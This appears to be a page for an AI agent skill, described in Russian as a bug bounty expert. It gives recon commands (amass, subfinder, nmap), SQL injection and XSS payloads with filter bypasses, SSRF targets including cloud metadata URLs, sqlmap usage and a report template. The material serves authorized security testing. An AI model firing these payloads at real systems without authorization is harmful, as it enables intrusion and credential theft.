Loading...
Loading...
Эксперт по bug bounty. Используй для поиска уязвимостей, написания отчётов, responsible disclosure и penetration testing.
npx skill4agent add dengineproblem/agents-monorepo bug-bounty-program# Пассивное перечисление
amass enum -passive -d target.com -o subdomains.txt
# Активное перечисление
subfinder -d target.com -all -o subfinder.txt
# DNS брутфорс
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt
# Объединение результатов
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt# Wappalyzer CLI
wappalyzer https://target.com
# WhatWeb
whatweb -a 3 https://target.com
# Nuclei technology detection
nuclei -u https://target.com -t technologies/# Быстрое сканирование
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full
# Сканирование сервисов
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--
-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--
-- Boolean-based blind
' AND 1=1--
' AND 1=2--# Basic injection test
sqlmap -u "https://target.com/page?id=1" --batch
# With authentication
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch
# POST data
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch
# Database enumeration
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch// Reflected XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
// DOM-based XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
// Stored XSS via different contexts
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>// In HTML attribute
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='
// In JavaScript string
';alert('XSS');//
"-alert('XSS')-"
// In URL parameter
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script># Localhost bypass
http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://127.1
http://0177.0.0.1
# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/# Out-of-band detection using Burp Collaborator
url = "http://your-collaborator-id.burpcollaborator.net"
# Webhook.site for testing
url = "https://webhook.site/unique-id"# Vulnerability Report
## Summary
[One-line description]
## Severity
[Critical/High/Medium/Low] - CVSS Score: X.X
## Affected Component
[URL/Endpoint/Feature]
## Description
[Detailed technical explanation]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]
## Proof of Concept
[Screenshots, code, requests]
## Impact
[Business/technical impact]
## Remediation
[Specific recommendations]
## References
[CVE, OWASP, etc.]| Program Type | Skill Level | Potential |
|---|---|---|
| New programs | Any | High |
| Broad scope | Intermediate | Medium |
| Narrow scope | Expert | Low-Medium |
| VDP only | Beginner | Low |